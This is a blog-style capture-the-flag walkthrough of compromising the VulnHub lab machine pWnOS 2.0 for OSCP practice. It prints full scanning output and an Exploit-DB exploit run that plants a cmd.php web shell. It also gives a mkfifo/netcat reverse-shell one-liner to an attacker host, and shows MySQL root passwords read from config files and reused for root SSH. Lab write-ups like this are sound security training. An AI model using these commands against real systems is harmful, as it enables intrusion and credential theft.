pWnOS 2.0 Walkthrough (OSCP Prep)
Introduction
In today’s installment in the OSCP Prep series, we’ll walk through owning pWnOS v2.0 from VulnHub.
pWnOS turned out to be a very simple machine requiring no more than basic enumeration to gain a foothold and move on to root quickly.
Before We Begin
According to the description, the pWnOS VM is set up with a static IP of 10.10.10.100. We’ll have to adjust our virtual network configuration accordingly in order to have connectivity to the machine. The virtual machines settings:
- IP:
10.10.10.100 - Netmask:
255.255.255.0 - Gateway:
10.10.10.15
I’ll also add the machine to the /etc/hosts file before beginning scanning.
Scanning
We’ll use RustScan to find any open ports and try to find some version information from Nmap.
(ori0n@apophis) --> [ ~/pwnos ]
==> rustscan -a pwnos -- -sV -oA scans/nmap-initial
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.100:80
Open 10.10.10.100:22
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -oA scans/nmap-initial" on ip 10.10.10.100
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 07:44 CDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 07:44
Scanning 10.10.10.100 [2 ports]
Completed Ping Scan at 07:44, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 07:44
Scanning pwnos (10.10.10.100) [2 ports]
Discovered open port 80/tcp on 10.10.10.100
Discovered open port 22/tcp on 10.10.10.100
Completed Connect Scan at 07:44, 0.00s elapsed (2 total ports)
Initiating Service scan at 07:44
Scanning 2 services on pwnos (10.10.10.100)
Completed Service scan at 07:45, 6.02s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.100.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Nmap scan report for pwnos (10.10.10.100)
Host is up, received syn-ack (0.00035s latency).
Scanned at 2021-08-15 07:44:57 CDT for 6s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.2.17 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.39 secondsSSH is typically not an attack vector, so we’ll begin with port 80.
Enumerating the Web Server
Launch a browser and head to http://pwnos. We’re greeted with an internal website.
We can try SQL injection on the “Login” page, and it seems to work, however we are never redirected anywhere useful.
Let’s use gobuster to search for any hidden file or folders.
(ori0n@apophis) --> [ ~/pwnos ]
==> gobuster dir -u http://pwnos -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://pwnos
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/08/15 07:53:06 Starting gobuster in directory enumeration mode
===============================================================
/index (Status: 200) [Size: 854]
/blog (Status: 301) [Size: 297] [--> http://pwnos/blog/]
/login (Status: 200) [Size: 1174]
/register (Status: 200) [Size: 1562]
/info (Status: 200) [Size: 49828]
/includes (Status: 301) [Size: 301] [--> http://pwnos/includes/]
/activate (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]
/server-status (Status: 403) [Size: 286]
===============================================================
2021/08/15 07:53:47 Finished
===============================================================It looks like we have a blog available. Let’s check it out.
Getting a Foothold
So we have the blog app version. Are there any public exploits?
(ori0n@apophis) --> [ ~/pwnos ]
==> searchsploit simple php blog 0.4.0
------------------------------------------------------------------------ -----------------------
Exploit Title | Path
------------------------------------------------------------------------ -----------------------
Simple PHP Blog 0.4.0 - Multiple Remote s | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit) | php/webapps/16883.rb
------------------------------------------------------------------------ -----------------------
Shellcodes: No ResultsWe want to avoid Metasploit, so let’s download the Perl script and have a look.
(ori0n@apophis) --> [ ~/pwnos ]
==> searchsploit -m php/webapps/1191.pl
Exploit: Simple PHP Blog 0.4.0 - Multiple Remote s
URL: https://www.exploit-db.com/exploits/1191
Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
File Type: Perl script text executable
Copied to: /home/ori0n/pwnos/1191.pl
(ori0n@apophis) --> [ ~/pwnos ]
==> mv 1191.pl sploit.pl
(ori0n@apophis) --> [ ~/pwnos ]
==> ./sploit.pl
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Program : ./sploit.pl
Version : v0.1
Date : 8/25/2005
Descript: This perl script demonstrates a few flaws in
SimplePHPBlog.
Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
NOT HAVE PERMISSION TO DO SO!
Please see this script comments for solution/fixes
to demonstrated vulnerabilities.
http://www.simplephpblog.com
Usage : ./sploit.pl [-h host] [-e exploit]
-? : this menu
-h : host
-e : exploit
(1) : Upload cmd.php in [site]/images/
(2) : Retreive Password file (hash)
(3) : Set New User Name and Password
[NOTE - uppercase switches for exploits]
-U : user name
-P : password
(4) : Delete a System File
-F : Path and System File
Examples: ./sploit.pl -h 127.0.0.1 -e 2
./sploit.pl -h 127.0.0.1 -e 3 -U l33t -P l33t
./sploit.pl -h 127.0.0.1 -e 4 -F ./index.php
./sploit.pl -h 127.0.0.1 -e 4 -F ../../../etc/passwd
./sploit.pl -h 127.0.0.1 -e 1It looks like we can upload a PHP shell. Let’s give it a shot.
(ori0n@apophis) --> [ ~/pwnos ]
==> ./sploit.pl -h http://pwnos/blog -e 1
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running cmd.php Upload Exploit....
Retrieved Username and Password Hash: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: a
Password is set to: a
Logged into SimplePHPBlog at: http://pwnos/blog/login_cgi.php
Current Username 'a' and Password 'a'...
Created cmd.php on your local machine.
Created reset.php on your local machine.
Created cmd.php on target host: http://pwnos/blog
Created reset.php on target host: http://pwnos/blog
Removed cmd.php from your local machine.
Failed to POST 'http://pwnos/blog/images/reset.php': 500 Internal Server Error at ./sploit.pl line 418.
Removed reset.php from your local machine.
(ori0n@apophis) --> [ ~/pwnos ]
==> curl "http://pwnos/blog/images/cmd.php?cmd=id;ls+-la"
<hr/><pre>Command: id;ls -la</pre><hr/><br><pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 16
drwxrwxrwx 2 www-data www-data 4096 Jun 20 17:16 .
drwxrwxrwx 11 root root 4096 May 9 2011 ..
-rw-r--r-- 1 www-data www-data 172 Jun 20 17:16 cmd.php
-rw-r--r-- 1 www-data www-data 113 Jun 20 17:16 reset.php
</pre><hr/>.We have command execution! Now let’s get a better shell. Do we have Netcat available?
(ori0n@apophis) --> [ ~/pwnos ]
==> curl "http://pwnos/blog/images/cmd.php?cmd=which+nc"
<hr/><pre>Command: which nc</pre><hr/><br><pre>/bin/nc
</pre><hr/>.We do. Is it a helpful version or the pesky OpenBSD build?
(ori0n@apophis) --> [ ~/pwnos ]
==> curl "http://pwnos/blog/images/cmd.php?cmd=nc+-h+2>%261"
<hr/><pre>Command: nc -h 2>&1</pre><hr/><br><pre>OpenBSD netcat (Debian patchlevel 1.89-3ubuntu5)
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-P proxy_username] [-p source_port]
[-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [hostname] [port[s]]
Command Summary:
-4 Use IPv4
-6 Use IPv6
-D Enable the debug socket option
-d Detach from stdin
-h This help text
-i secs Delay interval for lines sent, ports scanned
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects
-n Suppress name/port resolutions
-P proxyuser Username for proxy authentication
-p port Specify local port for remote connects
-q secs quit after EOF on stdin and delay of secs
-r Randomize remote ports
-S Enable the TCP MD5 signature option
-s addr Local source address
-T ToS Set IP Type of Service
-C Send CRLF as line-ending
-t Answer TELNET negotiation
-U Use UNIX domain socket
-u UDP mode
-v Verbose
-w secs Timeout for connects and final net reads
-X proto Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-z Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]
</pre><hr/>.It’s the OpenBSD version. No worries. We’ll just use the pipe trick: rm /tmp/f; mkfifo /tmp/f; bash < /tmp/f | nc 10.10.10.10 4444 > /tmp/f 2>&1. We’ll set up a listener in another terminal and see if we can catch a shell.
(ori0n@apophis) --> [ ~/pwnos ]
==> curl "http://pwnos/blog/images/cmd.php?cmd=rm+/tmp/f;mkfifo+/tmp/f;bash</tmp/f|nc+10.10.10.10+4444>/tmp/f+2>%261"And it works! We’ve got our shell.
On to root
With a shell in hand, let’s enumerate the web server from the inside. We find a potentially juicy file.
cd /var/www
ls -l
total 36
-rw-r--r-- 1 root root 1374 Mar 24 2008 activate.php
drwxrwxrwx 11 root root 4096 May 9 2011 blog
drwxr-xr-x 2 root root 4096 May 7 2011 includes
-rw-r--r-- 1 root root 629 May 7 2011 index.php
-rw-r--r-- 1 root root 23 Apr 3 2008 info.php
-rw-r--r-- 1 root root 3091 May 7 2011 login.php
-rw-r--r-- 1 root root 516 Apr 2 2008 mysqli_connect.php
-rw-r--r-- 1 root root 4618 Apr 2 2008 register.php
head mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');Unfortunately, this password doesn’t seem to actually get us into the database. Moving on.
cd ..
ls -l
total 56
drwxr-xr-x 2 root root 4096 Apr 21 2011 backups
drwxr-xr-x 8 root root 4096 May 7 2011 cache
drwxrwxrwt 2 root root 4096 May 7 2011 crash
-rw-r--r-- 1 root root 177 May 7 2011 index.html
drwxr-xr-x 34 root root 4096 May 7 2011 lib
drwxrwsr-x 2 root staff 4096 Apr 21 2011 local
drwxrwxrwt 4 root root 80 Jun 20 16:33 lock
drwxr-xr-x 11 root root 4096 Jun 20 16:32 log
drwxrwsr-x 2 root mail 4096 May 7 2011 mail
-rw-r--r-- 1 root root 520 May 7 2011 mysqli_connect.php
drwxr-xr-x 2 root root 4096 May 7 2011 opt
drwxr-xr-x 10 root root 420 Jun 20 16:32 run
drwxr-xr-x 4 root root 4096 May 7 2011 spool
drwxrwxrwt 2 root root 4096 Apr 21 2011 tmp
drwxr-xr-x 2 root root 4096 May 7 2011 uploads
drwxr-xr-x 4 root root 4096 May 9 2011 www
head mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php
// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.
// Set the database access information as constants:
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');What’s this? Another MySQL root password? Let’s try this one.
mysql -u root -p
root@ISIntS
show databases;
quit;
Database
information_schema
ch16
mysqlIt’s going to be a pain to try to use MySQL from this netcat shell. We’ll need to upgrade our shell, but first, let’s see if password reuse is an issue on this box. Can root log in through SSH?
grep -i root /etc/ssh/sshd_config
PermitRootLogin yes
# the setting of "PermitRootLogin without-password".He can. Let’s try this password from another terminal.
(ori0n@apophis) --> [ ~/pwnos ]
==> ssh root@pwnos
root@pwnos's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)
* Documentation: http://www.ubuntu.com/server/doc
System information as of Sun Jun 20 17:33:53 EDT 2021
System load: 0.0 Processes: 80
Usage of /: 3.0% of 38.64GB Users logged in: 0
Memory usage: 26% IP address for eth0: 10.10.10.100
Swap usage: 0%
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May 9 19:29:03 2011
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)And it works! Winner, winner, chicken dinner!
There is no flag on this system. We’ve got root. We’ve won.
Wrapping Up
pWnOS 2.0 was a fun box, but a very quick own. It will be worth coming back to later to look for other methods to get root.
Leave a Reply